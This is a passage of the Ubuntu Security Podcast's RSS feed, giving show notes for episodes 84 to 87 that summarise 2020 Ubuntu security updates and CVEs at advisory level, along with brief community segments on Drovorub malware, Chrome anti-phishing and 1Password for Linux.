<li><a href="https://ubuntu.com/security/CVE-2018-15751">CVE-2018-15751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15750">CVE-2018-15750</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>File enumeration on remote server -&gt; info leak</li>
<li>Authentication bypass</li>
<li>Command injection from unauthenticated users -&gt; code exec on salt-api host</li>
<li>Failure to validate method calls and sanitize paths - access control
bypass</li>
</ul>
<h3 id="usn-4460-1-oniguruma-vulnerabilities-03-58">[<a href="https://usn.ubuntu.com/4460-1/">USN-4460-1</a>] Oniguruma vulnerabilities [03:58]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19246">CVE-2019-19246</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19204">CVE-2019-19204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19012">CVE-2019-19012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16163">CVE-2019-16163</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>regex library used by PHP and Ruby -&gt; various issues leading to DoS /
info leak etc</li>
</ul>
<h3 id="usn-4461-1-ark-vulnerability-04-20">[<a href="https://usn.ubuntu.com/4461-1/">USN-4461-1</a>] Ark vulnerability [04:20]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16116">CVE-2020-16116</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>KDE archive handler - malicious ZIP files could contain files outside the
working directory (zip-slip)</li>
</ul>
<h3 id="usn-4465-1-linux-kernel-vulnerabilities-04-50">[<a href="https://usn.ubuntu.com/4465-1/">USN-4465-1</a>] Linux kernel vulnerabilities [04:50]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15393">CVE-2020-15393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12771">CVE-2020-12771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12655">CVE-2020-12655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 (hwe)</li>
<li>Memory leak in USB testing driver on disconnect - so physical attacker
could add / remove device and eventually exhaust memory</li>
<li>bcache deadlock -&gt; DoS</li>
<li>Crafted XFS metadata could cause a sync of excessive duration -&gt; DoS</li>
</ul>
<h3 id="usn-4462-1-linux-kernel-vulnerability-05-53">[<a href="https://usn.ubuntu.com/4462-1/">USN-4462-1</a>] Linux kernel vulnerability [05:53]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12771">CVE-2020-12771</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.0 (gke / oem)</li>
<li>bcache deadlock -&gt; DoS</li>
</ul>
<h3 id="usn-4463-1-linux-kernel-vulnerabilities-06-06">[<a href="https://usn.ubuntu.com/4463-1/">USN-4463-1</a>] Linux kernel vulnerabilities [06:06]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15393">CVE-2020-15393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12771">CVE-2020-12771</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 (xenial / trusy esm hwe)</li>
<li>bcache deadlock</li>
<li>usb testing driver memory leak</li>
</ul>
<h3 id="usn-4464-1-gnome-shell-vulnerability-06-24">[<a href="https://usn.ubuntu.com/4464-1/">USN-4464-1</a>] GNOME Shell vulnerability [06:24]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-17489">CVE-2020-17489</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Could show the login password when logging out <strong>if had set it visible
during login</strong></li>
</ul>
<h3 id="usn-4466-1-curl-vulnerability-06-53">[<a href="https://usn.ubuntu.com/4466-1/">USN-4466-1</a>] curl vulnerability [06:53]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8231">CVE-2020-8231</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>libcurl - improper handling of the CURLOPT_CONNECT_ONLY option -&gt; could
connect to wrong destination and so expose sensitive info</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-drovorub-linux-malware-07-24">Joe and Alex discuss Drovorub Linux malware [07:24]</h3>
<ul>
<li><a href="https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF">https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E087.mp3" length="22290299" type="audio/mpeg" /><itunes:duration>23:13</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 86
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-86/</link>
          <pubDate>Thu, 13 Aug 2020 15:05:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>cb371a6fa4fa18b2d70733bdb903407e954c3b45ff4716bb4f3217d550360b201c064dbe34f0b29528f46c11ff310574bb0e59b921d4e4f8ebea274d10106741</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 86</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we discuss the recent announcement of a long-awaited native
  client for 1password, plus Google Chrome experiments with anti-phishing
  techniques, and we take a look at security updates for OpenJDK 8, Samba,
  NSS and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we discuss the recent announcement of a long-awaited native
  client for 1password, plus Google Chrome experiments with anti-phishing
  techniques, and we take a look at security updates for OpenJDK 8, Samba,
  NSS and more.
  </itunes:summary>
        <description>  This week we discuss the recent announcement of a long-awaited native
  client for 1password, plus Google Chrome experiments with anti-phishing
  techniques, and we take a look at security updates for OpenJDK 8, Samba,
  NSS and more.
  </description>
        <googleplay:description>  This week we discuss the recent announcement of a long-awaited native
  client for 1password, plus Google Chrome experiments with anti-phishing
  techniques, and we take a look at security updates for OpenJDK 8, Samba,
  NSS and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we discuss the recent announcement of a long-awaited native
client for 1password, plus Google Chrome experiments with anti-phishing
techniques, and we take a look at security updates for OpenJDK 8, Samba,
NSS and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>13 unique CVEs addressed</p>
<h3 id="usn-4453-1-openjdk-8-vulnerabilities-01-03">[<a href="https://usn.ubuntu.com/4453-1/">USN-4453-1</a>] OpenJDK 8 vulnerabilities [01:03]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14621">CVE-2020-14621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14593">CVE-2020-14593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14583">CVE-2020-14583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14581">CVE-2020-14581</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14579">CVE-2020-14579</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14578">CVE-2020-14578</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14577">CVE-2020-14577</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14556">CVE-2020-14556</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual mix of issues for a Java update - sandbox escape, DoS, information
disclosure etc</li>
</ul>
<h3 id="usn-4451-2-ppp-vulnerability-01-29">[<a href="https://usn.ubuntu.com/4451-2/">USN-4451-2</a>] ppp vulnerability [01:29]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15704">CVE-2020-15704</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-85/">Episode 85</a></li>
</ul>
<h3 id="usn-4454-1-usn-4454-2-samba-vulnerability-01-50">[<a href="https://usn.ubuntu.com/4454-1/">USN-4454-1</a>, <a href="https://usn.ubuntu.com/4454-2/">USN-4454-2</a>] Samba vulnerability [01:50]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM),
Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14303">CVE-2020-14303</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>A remote attacker could send a zero length UDP packet to Samba when
acting as a AD DC with NetBIOS over TCP (NBT) enabled - would effectively
enter an infinite loop -&gt; CPU-based DoS</li>
</ul>
<h3 id="usn-4455-1-nss-vulnerabilities-02-41">[<a href="https://usn.ubuntu.com/4455-1/">USN-4455-1</a>] NSS vulnerabilities [02:41]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-6829">CVE-2020-6829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12401">CVE-2020-12401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12400">CVE-2020-12400</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fixes for various side-channel attacks against elliptic curve crypto
implementations - could allow an attacker to infer the private key</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="google-chrome-86-to-only-show-domain-in-url-bar-for-phishing-experiment-03-20">Google Chrome 86 to only show domain in URL bar for phishing experiment [03:20]</h3>
<ul>
<li>Will only show just the domain in the URL bar to select users to see if
this helps avoid phishing
<ul>
<li>Presumably users will be less likely to mistake a URL like
<a href="http://h.paypal.de-checking.net/de/ID.php?u=LhsdoOKJfsjdsdvg">http://h.paypal.de-checking.net/de/ID.php?u=LhsdoOKJfsjdsdvg</a>  for a
real paypay.com URL</li>
</ul>
</li>
<li>One way to help avoid phishing, particularly for credentials, is to use a
password manager that associates credentials with the site in question -
so it should only offer to say fill-in your paypal credentials on a
paypal.com site - and if it does not this is a hint it is not legitimate
<ul>
<li>Has other benefits too like being able to autogenerate unique passwords
per site, sync across devices etc</li>
</ul>
</li>
</ul>
<h3 id="1password-just-launched-a-beta-of-their-linux-client-06-46">1password just launched a beta of their Linux client [06:46]</h3>
<ul>
<li><a href="https://discussions.agilebits.com/discussion/114964/1password-for-linux-development-preview">https://discussions.agilebits.com/discussion/114964/1password-for-linux-development-preview</a></li>
<li><a href="https://snapcraft.io/1password">https://snapcraft.io/1password</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E086.mp3" length="8732957" type="audio/mpeg" /><itunes:duration>09:05</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 85
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-85/</link>
          <pubDate>Thu, 06 Aug 2020 17:40:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>d757a6a0e4de909f77a2903c9ab74a32d195b760a49eb3c6d365655b97afdb706b9407af9122d584f189db2e5e235004a7bd7c14d20e4316ffd0197009ae921b</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 85</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Dr. Levi Perigo is our special guest this week to discuss SDN and NFV with
  Joe, plus Alex does the weekly roundup of security updates, including
  Ghostscript, Squid, Apport, Whoopsie, libvirt and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Dr. Levi Perigo is our special guest this week to discuss SDN and NFV with
  Joe, plus Alex does the weekly roundup of security updates, including
  Ghostscript, Squid, Apport, Whoopsie, libvirt and more.
  </itunes:summary>
        <description>  Dr. Levi Perigo is our special guest this week to discuss SDN and NFV with
  Joe, plus Alex does the weekly roundup of security updates, including
  Ghostscript, Squid, Apport, Whoopsie, libvirt and more.
  </description>
        <googleplay:description>  Dr. Levi Perigo is our special guest this week to discuss SDN and NFV with
  Joe, plus Alex does the weekly roundup of security updates, including
  Ghostscript, Squid, Apport, Whoopsie, libvirt and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Dr. Levi Perigo is our special guest this week to discuss SDN and NFV with
Joe, plus Alex does the weekly roundup of security updates, including
Ghostscript, Squid, Apport, Whoopsie, libvirt and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>37 unique CVEs addressed</p>
<h3 id="usn-4444-1-webkitgtk-vulnerabilities-00-48">[<a href="https://usn.ubuntu.com/4444-1/">USN-4444-1</a>] WebKitGTK vulnerabilities [00:48]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9925">CVE-2020-9925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9915">CVE-2020-9915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9895">CVE-2020-9895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9894">CVE-2020-9894</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9893">CVE-2020-9893</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9862">CVE-2020-9862</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various issues in web / JS engines - remote attacker with a malicious
website could cause XSS, DoS, RCE etc</li>
</ul>
<h3 id="usn-4445-1-ghostscript-vulnerability-01-22">[<a href="https://usn.ubuntu.com/4445-1/">USN-4445-1</a>] Ghostscript vulnerability [01:22]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15900">CVE-2020-15900</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Integer overflow via `rsearch` operator - could allow to override file
access controls and hence get code execution as the user who is viewing /
processing the PS file - only affects most recent versions</li>
</ul>
<h3 id="usn-4446-1-squid-vulnerabilities-02-24">[<a href="https://usn.ubuntu.com/4446-1/">USN-4446-1</a>] Squid vulnerabilities [02:24]</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18676">CVE-2019-18676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12524">CVE-2019-12524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12523">CVE-2019-12523</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12520">CVE-2019-12520</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Jeriko One &amp; Kristoffer Danielsson - incorrect cache handling -&gt; cache
injection attacks. Incorrect URN / URL handling -&gt; bypass access / rule
checks. Input validation failure -&gt; crash, DoS</li>
</ul>
<h3 id="usn-4298-2-sqlite-vulnerabilities-03-07">[<a href="https://usn.ubuntu.com/4298-2/">USN-4298-2</a>] SQLite vulnerabilities [03:07]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19926">CVE-2019-19926</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13751">CVE-2019-13751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13753">CVE-2019-13753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13752">CVE-2019-13752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13750">CVE-2019-13750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13734">CVE-2019-13734</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-66/">Episode 66</a></li>
</ul>
<h3 id="usn-4447-1-libssh-vulnerability-03-27">[<a href="https://usn.ubuntu.com/4447-1/">USN-4447-1</a>] libssh vulnerability [03:27]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16135">CVE-2020-16135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Under low memory conditions, could fail to allocate a buffer, would
result in a NULL pointer dereference and hence crash</li>
</ul>
<h3 id="usn-4448-1-tomcat-vulnerabilities-04-01">[<a href="https://usn.ubuntu.com/4448-1/">USN-4448-1</a>] Tomcat vulnerabilities [04:01]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9484">CVE-2020-9484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1935">CVE-2020-1935</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13935">CVE-2020-13935</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Infinite loop if sent a WebSocket frame with an invalid payload length -&gt;
DoS if then sent multiple requests</li>
</ul>
<h3 id="usn-4449-1-apport-vulnerabilities-04-23">[<a href="https://usn.ubuntu.com/4449-1/">USN-4449-1</a>] Apport vulnerabilities [04:23]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15702">CVE-2020-15702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15701">CVE-2020-15701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11936">CVE-2020-11936</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 from Ryota Shiga:
<ul>
<li>Failed to drop privileges correctly when invoking gdbus to determine if
the user is closing their session -&gt; would be invoked with root group
privileges and using the environement of the user - they could override
the DBUS_SESSION_BUS_ADDRESS environment variable, causing gdbus to
connect to a spoofed dbus server and in the process to read a 16-byte
nonce from a file of their choosing - allows to read arbitrary files
that are 16-bytes of length</li>
<li>TOCTOU issue when handling crash dump - if process PID gets recycled
apport could include the wrong processes details in a crash dump that
is then readable by other users - fixed to check process start time is
at least before the time apport itself was invoked</li>
</ul>
</li>
<li>1 from Seong-Joong Kim
<ul>
<li>Unhandled exception when parsing users preferences configuration file
-&gt; crash, DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-4450-1-whoopsie-vulnerabilities-07-24">[<a href="https://usn.ubuntu.com/4450-1/">USN-4450-1</a>] Whoopsie vulnerabilities [07:24]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15570">CVE-2020-15570</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12135">CVE-2020-12135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11937">CVE-2020-11937</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All 3 from Seong-Joong Kim
<ul>
<li>Crash when trying to process a crafted crash file (tries to allocate
too large amount of memory and crashes) -&gt; DoS</li>
<li>Integer overflow in vendored bson library when parsing a crafted crash
dump -&gt; heap overflow -&gt; crash, RCE</li>
<li>Memory leak when parsing crash dumps -&gt; crafted report with many
repeated key / value pairs -&gt; OOM, crash -&gt; DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-4451-1-ppp-vulnerability-09-18">[<a href="https://usn.ubuntu.com/4451-1/">USN-4451-1</a>] ppp vulnerability [09:18]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15704">CVE-2020-15704</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Ubuntu specific patch - pppd is setuid() root and would helpfully
modprobe ppp_generic module when needed - but would not clear
MODPROBE_OPTIONS environment module and so this could be used to either
load other modules or read other files as root etc - fixed by removing
this functionality since this has not been needed for a long time as
ppp_generic has been built into the kernel since 2012 (ie there is no
ppp_generic module to even load via modprobe)</li>
</ul>
<h3 id="usn-4452-1-libvirt-vulnerability-10-31">[<a href="https://usn.ubuntu.com/4452-1/">USN-4452-1</a>] libvirt vulnerability [10:31]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15708">CVE-2020-15708</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>libvirt package sets up the libvirt socket via systemd - systemd unit
specifies a SocketMode=0666 so is world writable :( - fixed to ensure
systemd unit specifies this as only owner/group writable and ensures the
owner is root and group is libvirt</li>
</ul>
<h3 id="usn-4432-2-grub2-regression-11-10">[<a href="https://usn.ubuntu.com/4432-2/">USN-4432-2</a>] GRUB2 regression [11:10]</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15707">CVE-2020-15707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15705">CVE-2020-15705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14308">CVE-2020-14308</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14311">CVE-2020-14311</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14310">CVE-2020-14310</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14309">CVE-2020-14309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15706">CVE-2020-15706</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10713">CVE-2020-10713</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Legacy BIOS systems - grub core (in MBR) and modules (in file-system)
could get out of sync if grub was not being installed onto the correct
disk (this was the case for some users with manually configured RAID
setups / particular cloud images etc) - fixed to just not do the grub
install on the update to ensure they don&rsquo;t get out of sync (since these
vulnerabilities only are relevant to UEFI secure boot, no need for the
update in BIOS boot systems).</li>
</ul>
<h3 id="usn-4441-2-mysql-regression-12-58">[<a href="https://usn.ubuntu.com/4441-2/">USN-4441-2</a>] MySQL regression [12:58]</h3>
<ul>
<li>Affecting Focal (20.04 LTS)</li>
<li>Compiler options changed upstream and this could affect other libraries /
apps which link against libmysqlclient - reverted this change since is
not security relevant anyway</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-talks-sdn-and-nfv-with-dr-dot-levi-perigo-of-the-university-of-colorado-13-28">Joe talks SDN &amp; NFV with Dr. Levi Perigo of the University of Colorado [13:28]</h3>
<ul>
<li><a href="https://www.colorado.edu/cs/levi-perigo">https://www.colorado.edu/cs/levi-perigo</a></li>
<li><a href="https://www.raveninnovation.com/our-team">https://www.raveninnovation.com/our-team</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E085.mp3" length="30555442" type="audio/mpeg" /><itunes:duration>31:49</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 84
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-84/</link>
          <pubDate>Thu, 30 Jul 2020 16:00:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>807af41d4da5799d608b734fc89b13875ca83d11da47e9eeeef806411511bc7b2b05cf77960cc27ac8da29566d0a69e2ddc07e9ef1e94fa7aa83068985ced03c</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 84</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In a week when too many security updates are never enough, we cover the
  biggest one of them all for a while, BootHole, with an interview between
  Joe McManus and Alex Murray for some behind-the-scenes and in-depth
  coverage, plus we also...
        
        ]]></itunes:subtitle>
        <itunes:summary>  In a week when too many security updates are never enough, we cover the
  biggest one of them all for a while, BootHole, with an interview between
  Joe McManus and Alex Murray for some behind-the-scenes and in-depth
  coverage, plus we also look briefly at the other 100-odd CVEs for the week
  in FFmpeg, OpenJDK, LibVNCServer, ClamAV and more.
  </itunes:summary>
        <description>  In a week when too many security updates are never enough, we cover the
  biggest one of them all for a while, BootHole, with an interview between
  Joe McManus and Alex Murray for some behind-the-scenes and in-depth
  coverage, plus we also look briefly at the other 100-odd CVEs for the week
  in FFmpeg, OpenJDK, LibVNCServer, ClamAV and more.
  </description>
        <googleplay:description>  In a week when too many security updates are never enough, we cover the
  biggest one of them all for a while, BootHole, with an interview between
  Joe McManus and Alex Murray for some behind-the-scenes and in-depth
  coverage, plus we also look briefly at the other 100-odd CVEs for the week
  in FFmpeg, OpenJDK, LibVNCServer, ClamAV and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In a week when too many security updates are never enough, we cover the
biggest one of them all for a while, BootHole, with an interview between
Joe McManus and Alex Murray for some behind-the-scenes and in-depth
coverage, plus we also look briefly at the other 100-odd CVEs for the week
in FFmpeg, OpenJDK, LibVNCServer, ClamAV and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>109 unique CVEs addressed</p>
<h3 id="usn-4428-1-python-vulnerabilities-01-03">[<a href="https://usn.ubuntu.com/4428-1/">USN-4428-1</a>] Python vulnerabilities [01:03]</h3>
<ul>
<li>4 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM),
Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14422">CVE-2020-14422</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9674">CVE-2019-9674</a> <!-- raw HTML omitted --></li>
